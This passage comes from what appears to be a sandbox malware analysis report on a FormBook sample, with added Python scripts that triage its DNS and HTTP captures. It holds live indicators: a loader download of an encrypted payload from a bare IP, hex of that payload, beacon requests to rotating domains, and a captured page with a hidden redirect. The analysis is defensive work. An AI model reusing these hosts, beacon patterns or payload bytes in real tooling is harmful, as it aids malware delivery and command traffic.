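    ("09:55:12.914", 0x1738, 2, "www.ibluebay3dwd.com", None, None),
    ("09:55:13.924", 0x1738, 2, "www.ibluebay3dwd.com", None, None),
    ("09:55:16.956", 0x1738, 2, "www.ibluebay3dwd.com", None, None),
    ("09:55:50.483", 0x6281, 2, "www.resp04.online", None, None),
    ("09:55:55.562", 0x3ef6, 0, "www.process-activation.net", None, "109.68.33.25"),
]

RCODE_NAMES = {0: "NOERROR", 2: "SERVFAIL", 3: "NXDOMAIN"}


def resolve_chain(records, name, max_depth=8):
    """Follow CNAMEs from `name` through the (name, cname, address) records of
    one response. Returns (chain_of_names, sorted_addresses). The depth cap and
    the loop check keep a malformed or looping CNAME set from running forever."""
    chain, current = [name], name
    for _ in range(max_depth):
        targets = [c for (n, c, _) in records if n == current and c]
        if not targets or targets[0] in chain:
            break
        current = targets[0]
        chain.append(current)
    addresses = sorted(a for (n, _, a) in records if n == current and a)
    return chain, addresses


def summarize(queries, answers):
    """Per queried name: attempts, distinct responses, outcome, CNAME chain, addresses."""
    attempts, name_of = defaultdict(int), {}
    for _, tid, name in queries:
        attempts[tid] += 1          # same transaction ID reused => retransmission
        name_of[tid] = name

    responses = defaultdict(list)
    for ts, tid, rcode, name, cname, addr in answers:
        responses[tid].append((ts, rcode, name, cname, addr))

    report = {}
    for tid, name in name_of.items():
        resp = responses.get(tid, [])
        rcodes = [r for (_, r, _, _, _) in resp]
        if not rcodes:
            status = "NORESPONSE"
        elif 0 in rcodes:
            status = "NOERROR"
        else:
            status = RCODE_NAMES.get(rcodes[-1], "RCODE%d" % rcodes[-1])
        ok_records = [(n, c, a) for (_, r, n, c, a) in resp if r == 0]
        chain, addrs = resolve_chain(ok_records, name) if ok_records else ([name], [])
        report[name] = {
            "trans_id": tid,
            "queries": attempts[tid],
            "responses": len({ts for (ts, *_rest) in resp}),
            "status": status,
            "chain": chain,
            "addresses": addrs,
        }
    return report


def retried_or_failed(report):
    """Names that needed retransmission or never resolved: the ones to look at twice."""
    return sorted(n for n, r in report.items()
                  if r["queries"] > 1 or r["status"] != "NOERROR")


if __name__ == "__main__":
    for name, row in summarize(QUERIES, ANSWERS).items():
        print("%-28s %-10s queries=%d responses=%d %s %s" % (
            name, row["status"], row["queries"], row["responses"],
            " -> ".join(row["chain"]), row["addresses"]))
```

The four queries for www.ibluebay3dwd.com produce only three responses in the capture, and all of them are SERVFAIL; on a real pcap the same join tells you which of a FormBook host list actually resolved and which addresses to add to a block list.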

HTTP Request Dependency Graph

• 45.153.203.193
• www.hamiltonparkpdx.com
• www.readingqueens.com
• www.winningscotland.com
• www.kreatelymedia.com
• www.neuroacademyok.com
• www.india-vspakistanlive.com
• www.bloomingintoyou.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49719 | 45.153.203.193 | 80 | C:\Users\user\Desktop\dwg.exe
Timestamp | kBytes transferred | Direction | Data
Feb 24, 2021 09:54:12.190742970 CET | 1327 | OUT | GET /nn.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 45.153.203.193
Cache-Control: no-cache
Feb 24, 2021 09:54:12.369791985 CET | 1329 | IN | HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Wed, 24 Feb 2021 03:41:51 GMT
Accept-Ranges: bytes
ETag: "4618dfc5ead71:0"
Server: Microsoft-IIS/10.0
Date: Wed, 24 Feb 2021 08:54:12 GMT
Content-Length: 164928
                                                              Data Raw: 8d d1 bf 5b 00 c1 30 8c 0f 47 55 6d 04 ff 9e f2 8b d9 f1 c5 a4 79 02 75 a1 e9 51 2a db 44 14 e9 46 0f ea 41 a3 07 de c0 3b 32 58 b4 e4 d8 fa 76 57 c9 d2 c4 70 92 18 84 9e e8 f4 eb e4 26 0a 23 f7 43 d4 f2 e9 43 42 f6 d3 0d ec c0 c1 f6 ce 7b 01 a1 2a 6c 86 7f e6 4c 94 0b af ee 95 a3 22 9c f4 69 a1 fd 64 6f 43 48 67 59 3a 9b da 41 e7 87 f8 79 40 65 4b 14 fb 0a 95 4f 21 86 75 52 55 51 06 2b 3b 48 11 01 9d 59 57 08 f4 4b 19 c4 0b fd f3 21 c9 8c 79 ec 99 18 e3 89 59 03 43 35 19 9d d8 d4 d9 66 94 84 33 a3 9a ba 34 5f fc 52 e1 ae 48 21 65 31 bc db ce 3c 57 1f b3 6a ef a6 9f e5 e3 50 e4 a9 ed a8 4c 98 4a cf 2f e1 1b e4 08 42 92 15 93 b7 e5 9e f6 c0 ad 0b 1e f9 44 e3 99 0e f8 af 4b 05 60 b3 f7 3c 1f 98 cc f7 f0 0c 72 99 f8 83 14 c2 23 0d 7d bc db f5 a1 85 2e 26 80 70 5c ab 78 2a f6 a1 44 a2 5b 48 47 17 34 2d 85 f3 42 4f a4 1d 15 7e 26 17 18 3b 31 bb 73 50 09 4c d5 6f ea 36 a1 f6 82 7b 26 1f c0 f7 b6 79 48 79 31 d8 7a f2 05 48 5b 6d f1 b2 74 8c f5 64 36 75 8a 27 80 17 55 da 9a 83 ca b4 79 fd 8d 02 9e 05 d4 96 e5 f0 3f 3f cc 4e c9 c0 91 67 b8 71 98 45 5c e5 4c 84 d9 6e 96 f8 38 9d a6 4f 61 cf cf d1 5a cf 90 0d 13 01 65 eb 0e c3 8e 9a 87 f2 ce d2 82 6b ff 0a 0a 98 61 41 c0 5a 3a 72 a5 1a a4 c6 64 fc 26 8b c7 92 96 c4 91 b7 12 1f d4 64 7a 1d 1b b3 66 10 ef cb 46 cc 74 3f 9f 46 ff e5 4c 35 4f 03 3c c7 8d 50 56 87 19 cd 09 c8 bb 04 a1 bf ca ca f6 61 2d 5a cc 3a 07 3d 44 71 bc 21 a4 bb d0 d4 f9 02 ba 28 8b 73 ea 16 26 7b 4f 1d 69 54 3b 79 26 9c db 10 63 a0 61 bf 42 fa 67 f5 2c e7 36 65 fe 1e 93 5a 07 8d 9b 0f 46 13 8e 39 b3 fb ac 3b 77 ea e0 ef ba a0 6b c4 10 59 f4 f0 8e 6c 78 98 6c ef 77 0a 7c e5 f7 d6 f5 81 ad 60 37 43 75 e6 6a 66 0e ee 87 fd 6a 92 86 19 90 b6 38 c8 22 f5 6c 0b 03 c2 2d b9 49 fc cb b2 cd d9 ad ac fe 2b 9a 53 f7 eb 14 4c c2 df 07 0b c3 7f 24 93 e1 4c 2a fb ca 9d aa 75 7d 6a ec 31 46 b6 0a cb 98 be ce 06 79 12 f3 ff fe 5f e7 e8 7e 29 37 1f 62 04 ba 05 97 91 40 ed 65 8c 1c 2a a9 b0 00 df d7 1c 
98 99 a5 14 f5 79 5f 03 41 3e 3c 0e 08 89 11 27 b7 fa 91 75 d7 89 83 15 d8 8f 6a 1b 36 1b 42 7f 65 e6 25 c1 db 5c 9f 45 2d 95 95 80 c9 91 41 74 0d 77 7a 49 6f a9 ed 06 4e e9 59 0c 41 e5 52 62 e9 5f 6d 16 09 d2 07 f0 03 ba b0 d4 a7 3f b3 81 e1 4d 8b 0d fd 06 8b 0d 21 c6 0d 71 ee 3b 9c 9f b4 39 2f fc 60 b4 42 7a 39 24 ed 93 af b2 90 07 6a 98 ff 54 74 e2 99 92 dc 11 1e 12 47 e1 ed de 85 0e 91 88 bc bf 9d 34 24 b4 cc a9 a4 71 05 15 7b 5c 66 a3 98 32 2b aa ee b3 98 a5 35 56 e8 25 11 85 c5 d7 22 b4 2d 9c b3 17 bf cc 14 8e 94 1c 76 f1 1d 37 64 5f 97 dd b2 47 d0 89 ac 21 8e 7e 74 19 b9 d7 d2 45 be a6 c9 1e c9 9d 68 f2 8f 12 01 4a 29 4a ae db 58 2b 69 a1 71 b1 49 21 d8 9e f2 70 c9 1b c6 cf 4e 8e 62 79 9c db 32 80 3c fd 38 cc d9 9e 4e 5d 60 74 1f 2a 10 bf 27 0b c7 50 f3 e7 f1 85 68 03 f7 29 ba 21 e0 1c 4e 38 5f 79 ba 25 9e 06 67 9d 36 ce ea ef 37 ec 42 40 8d d1 b8 d2 fb ba 19 91 a0 01 43 42 f6 d3 55 6f 28 c8 7d 06 f8 c1 9d a1 6c 85 be 65 8c bc 08 a7 11 74 33 22 9c f4 69 a1 fd 64 6f 43 48 67 59 3a 9b da 41 e7 87 f8 79 40 65 4b 14 fb 0a 95 4f 21 86 cd 52 55 51 08 34 81 46 11 b5 94 94 76 b0 f5 07 d4 e5 5f 95 9a 52 e9 fc 0b 83 fe 6a 82 e4 79 60 22 5b 77 f2 ac f4 bb 03 b4 f6 46 cd ba d3 5a 7f b8 1d b2 8e 25 4e 01 54 92 d6 c3 36 73 1f b3 6a ef a6 9f e5 26 f5 6e bf 6c 6c a8 dd cb 0b cb a4 9a 20 ec 07 7c a7 dc f2 28 5a 12 85 43 b9 64 bc c6 27 7d 4b 16 1d 32 40
                                                              Data Ascii: [0GUmyuQ*DFA;2XvWp&#CCB{*lL"idoCHgY:Ay@eKO!uRUQ+;HYWK!yYC5f34_RH!e1<WjPLJ/BDK`<r#}.&p\x*D[HG4-BO~&;1sPLo6{&yHy1zH[mtd6u'Uy??NgqE\Ln8OaZekaAZ:rd&dzfFt?FL5O<PVa-Z:=Dq!(s&{OiT;y&caBg,6eZF9;wkYlxlw|`7Cujfj8"l-I+SL$L*u}j1Fy_~)7b@e*y_A><'uj6Be%\E-AtwzIoNYARb_m?M!q;9/`Bz9$jTtG4$q{\f2+5V%"-v7d_G!~tEhJ)JX+iqI!pNby2<8N]`t*'Ph)!N8_y%g67B@CBUo(}let3"idoCHgY:Ay@eKO!RUQ4Fv_Rjy`"[wFZ%NT6sj&nll |(ZCd'}K2@


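Session 0 is the loader stage: dwg.exe itself fetches /nn.bin from a bare IP with a hard-coded Internet Explorer User-Agent, and the 164928-byte application/octet-stream body that comes back does not start with an MZ header (the Data Raw above begins 8d d1 bf 5b), so it is not a plaintext executable but a blob the loader decrypts in memory. The Last-Modified header also dates the staging of that blob to about five hours before this run. The script below is an added example, not part of the Joe Sandbox report: it applies those checks to the captured headers and the first 128 body bytes, transcribed from session 0, and adds a byte-entropy measurement. The heuristics, the entropy threshold and the "non-browser process" test are this example's own choices.

```python
"""Triage a sandbox-captured download: plaintext executable, or an encrypted
blob for in-memory decryption? Added example, not from the report."""
import math
from collections import Counter

CLIENT_PROCESS = r"C:\Users\user\Desktop\dwg.exe"
REQUEST_HEADERS = {   # transcribed from session 0
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Host": "45.153.203.193",
    "Cache-Control": "no-cache",
}
RESPONSE_HEADERS = {  # transcribed from session 0
    "Content-Type": "application/octet-stream",
    "Server": "Microsoft-IIS/10.0",
    "Content-Length": "164928",
}
# First 128 bytes of the nn.bin response body, transcribed from Data Raw in session 0.
BODY_PREFIX = bytes.fromhex(
    "8dd1bf5b00c1308c0f47556d04ff9ef2"
    "8bd9f1c5a4790275a1e9512adb4414e9"
    "460fea41a307dec03b3258b4e4d8fa76"
    "57c9d2c4709218849ee8f4ebe4260a23"
    "f743d4f2e94342f6d30decc0c1f6ce7b"
    "01a12a6c867fe64c940bafee95a3229c"
    "f469a1fd646f434867593a9bda41e787"
    "f87940654b14fb0a954f218675525551"
)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte. 8.0 is the ceiling for long inputs; for a 128-byte sample the
    ceiling is log2(128) = 7, and encrypted or compressed data sits close to it."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_like_pe(data: bytes) -> bool:
    """A Windows executable served in the clear starts with the 'MZ' DOS header."""
    return data[:2] == b"MZ"


def is_bare_ipv4(host: str) -> bool:
    parts = host.split(".")
    return len(parts) == 4 and all(p.isdigit() and int(p) <= 255 for p in parts)


def triage_download(process, req, resp, body_prefix, entropy_threshold=6.0):
    """Return the reasons this download deserves analyst attention (empty if none)."""
    findings = []
    ua = req.get("User-Agent", "")
    if "Trident" in ua and not process.lower().endswith("\\iexplore.exe"):
        findings.append("Internet Explorer User-Agent sent by a non-browser process")
    if is_bare_ipv4(req.get("Host", "")):
        findings.append("Host header is a bare IP address, no domain")
    if (resp.get("Content-Type", "").startswith("application/octet-stream")
            and not looks_like_pe(body_prefix)):
        findings.append("octet-stream body does not start with an MZ header")
    entropy = shannon_entropy(body_prefix)
    if entropy >= entropy_threshold:
        findings.append("high-entropy body prefix (%.2f bits/byte): likely encrypted" % entropy)
    return findings


if __name__ == "__main__":
    for finding in triage_download(CLIENT_PROCESS, REQUEST_HEADERS,
                                   RESPONSE_HEADERS, BODY_PREFIX):
        print("-", finding)
```

All four checks fire on session 0. The entropy check is the one that generalises: a loader that fetched a plaintext PE would show an MZ header and a low-entropy DOS stub in the first bytes, while a payload encrypted for in-memory decryption looks uniformly random from byte zero.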
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49726 | 104.18.194.20 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 24, 2021 09:54:57.474004984 CET | 1531 | OUT | GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=g/ID2zcVRpzk9dEh2O/HeBX/PmjvP3gMDSJL8xLFEItD5siNJ7dqXm1dyHJfWJK4oFU1 HTTP/1.1
Host: www.hamiltonparkpdx.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 24, 2021 09:54:57.525089979 CET | 1531 | IN | HTTP/1.1 301 Moved Permanently
Date: Wed, 24 Feb 2021 08:54:57 GMT
Transfer-Encoding: chunked
Connection: close
Cache-Control: max-age=3600
Expires: Wed, 24 Feb 2021 09:54:57 GMT
Location: https://www.hamiltonparkpdx.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=g/ID2zcVRpzk9dEh2O/HeBX/PmjvP3gMDSJL8xLFEItD5siNJ7dqXm1dyHJfWJK4oFU1
cf-request-id: 0874d8b4e300004a7932305000000001
Server: cloudflare
CF-RAY: 6267f701696e4a79-FRA
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49733 | 142.250.185.179 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 24, 2021 09:55:02.684974909 CET | 1625 | OUT | GET /gzjz/?an=FjP/8nTVipDtB7rMeh6473uM1PeF+4kTlJ1YfKzI0TvNj01mXujzKbdkPkRKtuLnfvUf&Rxo=8pyT5Z4hoPNLSb HTTP/1.1
Host: www.readingqueens.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 24, 2021 09:55:02.847496986 CET | 1662 | IN | HTTP/1.1 301 Moved Permanently
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 24 Feb 2021 08:55:02 GMT
Location: https://www.readingqueens.com/gzjz/?an=FjP/8nTVipDtB7rMeh6473uM1PeF+4kTlJ1YfKzI0TvNj01mXujzKbdkPkRKtuLnfvUf&Rxo=8pyT5Z4hoPNLSb
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49738 | 3.223.115.185 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 24, 2021 09:55:18.232908964 CET | 5104 | OUT | GET /gzjz/?an=H++1jH4LKbR0fJKel0r+X/Bgsf9YQS9YCvMETuo+3edei6txUlQLYKB4EjEP5vt6Q2ea&Rxo=8pyT5Z4hoPNLSb HTTP/1.1
Host: www.winningscotland.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 24, 2021 09:55:18.360658884 CET | 5104 | IN | HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.hugedomains.com/domain_profile.cfm?d=winningscotland&e=com
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Wed, 24 Feb 2021 08:54:55 GMT
Connection: close
Content-Length: 191
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 67 65 64 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 70 72 6f 66 69 6c 65 2e 63 66 6d 3f 64 3d 77 69 6e 6e 69 6e 67 73 63 6f 74 6c 61 6e 64 26 61 6d 70 3b 65 3d 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=winningscotland&amp;e=com">here</a>.</h2></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49739 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 24, 2021 09:55:23.479542971 CET | 5106 | OUT | GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=LENh5Imcw7WV23PMDSK6gQgZ7usNfvsiux/HEpxATH+NcHhzFLQFIzxEn7XOqifbExQJ HTTP/1.1
Host: www.kreatelymedia.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 24, 2021 09:55:23.618812084 CET | 5107 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 24 Feb 2021 08:55:23 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6031584e-113"
Via: 1.1 google
Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49741 | 23.111.137.154 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 24, 2021 09:55:29.009828091 CET | 5131 | OUT | GET /gzjz/?an=/pUzTSccEH+RkAwwv+GOC/YRN8fCteWKlCqISlYUoueysdRKiHy5pXXTDI02yup/WIos&Rxo=8pyT5Z4hoPNLSb HTTP/1.1
Host: www.neuroacademyok.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 24, 2021 09:55:30.420865059 CET | 5140 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Type: text/html; charset=UTF-8
WPO-Cache-Status: not cached
WPO-Cache-Message: In the settings, caching is disabled for matches for one of the current request's GET parameters
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
X-Redirect-By: WordPress
Location: http://neuroacademyok.com/gzjz/?an=/pUzTSccEH+RkAwwv+GOC/YRN8fCteWKlCqISlYUoueysdRKiHy5pXXTDI02yup/WIos&Rxo=8pyT5Z4hoPNLSb
Content-Length: 0
Date: Wed, 24 Feb 2021 08:55:30 GMT
Server: LiteSpeed
Vary: User-Agent,User-Agent


Session ID: 6 | Source IP: 192.168.2.3 | Source Port: 49742 | Destination IP: 23.110.124.43 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 24, 2021 09:55:34.966166973 CET | 5141 | OUT | GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=jd3N18O1dmETY8AwSK2SCf/DBHf2WfDwkoednOutgI3n+6kC8/qkQJNPdpn7LPtDVMxb HTTP/1.1
Host: www.india-vspakistanlive.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 24, 2021 09:55:35.157524109 CET | 5142 | IN | HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST
Date: Wed, 24 Feb 2021 08:55:25 GMT
Connection: close
Content-Length: 768
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 3c 74 69 74 6c 65 3e e8 af b7 e7 a8 8d e7 ad 89 ef bc 8c e6 ad a3 e5 9c a8 e8 bf 9b e5 85 a5 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 7d 65 6c 73 65 20 7b 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 7d 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 20 20 3c 62 6f 64 79 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 68 68 61 70 70 78 7a 2e 63 6f 6d 2f 22 3e 20 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 
64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 73 63 72 69 70 74 3e 73 65 74 54 69 6d 65 6f 75 74 28 27 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 3d 22 20 68 74 74 70 3a 2f 2f 68 68 73 70 61 70 70 38 2e 63 6f 6d 2f 64 68 35 2f 69 6e 64 65 78 2e 68 74 6d 6c 22 3b 27 2c 20 33 30 30 30 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>...</title><script>(function(){var bp = document.createElement('script');var curProtocol = window.location.protocol.split(':')[0];if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';}else { bp.src = 'http://push.zhanzhang.baidu.com/push.js';}var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(bp, s);})();</script></head> <body><div style="display:none"><a href="http://www.hhappxz.com/"> </a></div><div style="display:none"><script>setTimeout('window.location=" http://hhspapp8.com/dh5/index.html";', 3000);</script></div></body></html>


Session ID: 7 | Source IP: 192.168.2.3 | Source Port: 49745 | Destination IP: 192.0.78.25 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 24, 2021 09:55:45.292023897 CET | 5179 | OUT | GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxRWYlijCvBEtCIbqNPIKBmez+UsXeV HTTP/1.1
Host: www.bloomingintoyou.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 24, 2021 09:55:45.332649946 CET | 5180 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 24 Feb 2021 08:55:45 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.bloomingintoyou.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxRWYlijCvBEtCIbqNPIKBmez+UsXeV
X-ac: 2.hhn _dfw
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
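The three sessions above share one shape: every request comes from explorer.exe, uses the same path /gzjz/, carries the same value Rxo=8pyT5Z4hoPNLSb next to a 68-character base64-alphabet blob in the other parameter, sends only a Host and a Connection: close header, and the Host rotates across unrelated domains. None of the responses is a C2 reply: two are generic 301 redirects from WordPress/LiteSpeed and nginx, the third is an IIS parking page that forwards visitors to another site. The indicators worth acting on are therefore the request shape, the constant parameter value and the originating process, not any single host. The following Python is an added example and not part of the Joe Sandbox report: it parses the three captured requests (embedded below as strings constructed from the sessions above, with the seven trailing 0x00 body bytes omitted), scores each against that shape, and correlates them across hosts. The regex thresholds and the list of system images are my assumptions, not report output.

```python
"""Triage of the explorer.exe HTTP beacons captured in the sessions above.

Added example: parses each raw request, scores it against the beacon shape
visible in the report, and correlates the sessions across hosts."""
import re
from collections import defaultdict

# Constructed from the three report sessions: (session id, originating process,
# destination IP, raw request). The seven trailing 0x00 body bytes that the
# report shows after each GET ("Data Raw: 00 00 00 00 00 00 00") are omitted.
SESSIONS = [
    (5, r"C:\Windows\explorer.exe", "23.111.137.154",
     "GET /gzjz/?an=/pUzTSccEH+RkAwwv+GOC/YRN8fCteWKlCqISlYUoueysdRKiHy5pXXTDI02yup/WIos"
     "&Rxo=8pyT5Z4hoPNLSb HTTP/1.1\r\nHost: www.neuroacademyok.com\r\nConnection: close\r\n\r\n"),
    (6, r"C:\Windows\explorer.exe", "23.110.124.43",
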